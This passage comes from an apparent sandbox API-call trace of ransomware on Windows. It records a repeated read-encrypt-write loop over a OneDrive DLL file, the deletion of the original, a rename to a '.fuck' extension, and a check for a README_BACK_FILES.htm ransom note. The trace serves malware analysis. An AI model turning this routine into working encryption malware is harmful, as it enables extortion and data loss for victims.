pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.500] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.500] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.500] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.500] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.500] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.500] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.500] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.500] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.500] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.500] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.501] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.501] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.501] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.501] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.501] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.501] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.501] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.501] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.501] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.501] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.501] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.501] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.501] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.501] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.501] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.502] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.502] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.502] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.502] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.502] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.502] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.502] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.503] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.503] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.503] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.503] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.503] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.503] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.503] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.503] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.503] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.503] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.503] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.504] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.504] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.504] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.504] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.504] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.504] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.504] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.504] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.504] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.504] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.504] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.504] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.504] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.504] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.504] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.505] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.505] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.505] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.505] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.505] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.505] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.505] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.505] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.505] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.505] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.505] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.505] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.506] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.506] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.506] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.506] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.506] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.506] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.506] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.506] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.506] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.506] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.506] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.506] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.506] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.506] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.506] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.507] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.507] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.507] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.507] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x1d0, lpOverlapped=0x0) returned 1 [0274.507] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x1d0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x1e0) returned 1 [0274.507] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x1e0, lpOverlapped=0x0) returned 1 [0274.507] CloseHandle (hObject=0x5d48) returned 1 [0274.507] CloseHandle (hObject=0x5d3c) returned 1 [0274.507] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\es\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\es\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\es\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\es\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0274.513] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\es\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0274.514] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\es\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\es\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0274.516] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\es\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\es\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\es\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\es\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0274.517] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0274.518] CryptDestroyKey (hKey=0x2fb488) returned 1 [0274.518] CryptReleaseContext (hProv=0x2f2a960, dwFlags=0x0) returned 1 [0274.518] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0274.518] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0274.519] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\es\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\es\\readme_back_files.htm")) returned 0xffffffff [0274.519] AreFileApisANSI () returned 1 [0274.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28894e8, 